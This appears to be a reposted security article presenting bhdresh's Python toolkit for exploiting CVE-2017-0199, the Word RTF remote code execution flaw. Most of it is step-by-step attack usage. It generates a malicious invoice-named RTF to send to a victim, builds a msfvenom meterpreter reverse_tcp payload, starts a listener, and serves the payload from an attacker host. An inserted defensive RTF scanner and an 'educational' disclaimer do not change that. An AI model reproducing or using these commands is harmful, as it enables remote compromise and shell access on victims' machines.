A Python exploit script for CVE-2017-0199

Category: Security Articles

Copyright notice:

This article was first published on the WeChat account inn0team.

The copyright of this article belongs to the original author, bhdresh.

Please retain this notice when reposting; violators will be held responsible.

Exploit toolkit CVE-2017-0199 - v2.0 is a Python script for quickly exploiting the Microsoft RTF RCE vulnerability. It generates a malicious RTF file and causes a metasploit/meterpreter payload to be executed on the target machine, without any complex configuration.

Development notes:

Features:

  1. Generate a malicious RTF file

  2. Run the toolkit in exploitation mode as a tiny HTA + web server

  3. Tested with Python version 2.7.13

Planned features:

  1. Send the malicious RTF file automatically by email

Usage:

Step 1: Generate the malicious RTF file and deliver it to the target machine.

  Syntax:
    # python cve-2017-0199_toolkit.py -M gen -w <filename.rtf> -u <http://attacker.com/test.hta>

  Example:
    # python cve-2017-0199_toolkit.py -M gen -w Invoice.rtf -u http://192.168.56.1/logo.doc

Step 2: Generate the msf payload and start a listener.

  Example:
    Generate payload:
    # msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.56.1 LPORT=4444 -f exe > /tmp/shell.exe

    Start handler:
    # msfconsole -x "use multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST 192.168.56.1; run"

Step 3: Use the script to serve the msf payload.

  Syntax:
    # python cve-2017-0199_toolkit.py -M exp -e <http://attacker.com/shell.exe> -l </tmp/shell.exe>

  Example:
    # python cve-2017-0199_toolkit.py -M exp -e http://192.168.56.1/shell.exe -l /tmp/shell.exe
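As an added defender-side example (not part of bhdresh's toolkit or of this article), the following Python 3 script triages RTF files for the pattern this exploit relies on: an OLE link object that is flagged to update automatically and whose object data carries a remote HTTP URL, which Word requests when the document is opened. The control words checked and the hex/UTF-16LE layout of the object data are assumptions taken from public analyses of CVE-2017-0199, not from this page, and the sample document is constructed inline.

```python
import re

# Heuristic (assumption, not from the article): CVE-2017-0199 RTF lures hold an
# OLE link object (\objautlink) flagged to auto-update (\objupdate) whose
# hex-encoded \objdata embeds the remote URL (often UTF-16LE), so Word fetches
# it on open. Control words that are split or null-padded will evade this check.
AUTLINK = re.compile(rb"\\objautlink", re.I)
UPDATE = re.compile(rb"\\objupdate", re.I)
OBJDATA = re.compile(rb"\\objdata\s*([0-9a-fA-F\r\n\t ]+)", re.I)
URL_RE = re.compile(rb"https?://[\w.\-]+(?::\d+)?/[^\s\"'}\\]*", re.I)


def _decode_objdata(data):
    """Decode every \\objdata hex blob; also return a null-stripped copy so
    UTF-16LE strings become searchable as plain ASCII."""
    out = []
    for run in OBJDATA.findall(data):
        run = re.sub(rb"\s+", b"", run)
        raw = bytes.fromhex(run[: len(run) & ~1].decode())
        out.append(raw)
        out.append(raw.replace(b"\x00", b""))
    return b"".join(out)


def scan_rtf(data):
    """Return findings for one RTF document; 'suspicious' is True only when
    the auto-updating link object and a remote URL are both present."""
    if not data.lstrip().startswith(b"{\\rt"):
        return {"is_rtf": False, "suspicious": False, "urls": []}
    haystack = data + _decode_objdata(data)
    urls = sorted({u.decode("latin-1") for u in URL_RE.findall(haystack)})
    autlink = bool(AUTLINK.search(data))
    update = bool(UPDATE.search(data))
    return {"is_rtf": True, "objautlink": autlink, "objupdate": update,
            "urls": urls, "suspicious": autlink and update and bool(urls)}


def build_sample(url):
    """Constructed test input (not a real sample): minimal RTF with an
    auto-updating link object whose object data carries the URL in UTF-16LE."""
    blob = (b"\x00" * 8 + url.encode("utf-16-le") + b"\x00\x00").hex().encode()
    return b"{\\rtf1{\\object\\objautlink\\objupdate{\\*\\objdata " + blob + b"}}}"


SAMPLE_MALICIOUS = build_sample("http://192.0.2.10/logo.doc")
SAMPLE_BENIGN = b"{\\rtf1 Quarterly invoice attached, see page 2.}"

if __name__ == "__main__":
    for name, doc in (("malicious", SAMPLE_MALICIOUS), ("benign", SAMPLE_BENIGN)):
        print(name, scan_rtf(doc))
```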

Script help:

  # python cve-2017-0199_toolkit.py -h

  This is a handy toolkit to exploit CVE-2017-0199 (Microsoft Word RTF RCE)

  Modes:

  -M gen                                          Generate Malicious RTF file only
      Generate malicious RTF file:
       -w <Filename.rtf>                   Name of malicious RTF file (Share this file with victim).
       -u <http://attacker.com/test.hta>   The path to an hta file. Normally, this should be a domain or IP where this tool is running.
                                           For example, http://attackerip.com/test.hta (This URL will be included in malicious RTF file and
                                           will be requested once victim will open malicious RTF file.

  -M exp                                          Start exploitation mode
      Exploitation:
       -p <TCP port:Default 80>            Local port number.
       -e <http://attacker.com/shell.exe>  The path of an executable file / meterpreter shell / payload  which needs to be executed on target.
       -l </tmp/shell.exe>                 Local path of an executable file / meterpreter shell / payload (If payload is hosted locally).

Disclaimer

This program is for Educational purpose ONLY. Do not use it without permission. The usual disclaimer applies, especially the fact that I (bhdresh) am not liable for any damages caused by direct or indirect use of the information or functionality provided by these programs. The author or any Internet provider bears NO responsibility for content or misuse of these programs or any derivatives thereof. By using this program you accept the fact that any damage (data loss, system crash, system compromise, etc.) caused by the use of these programs is not bhdresh's responsibility.
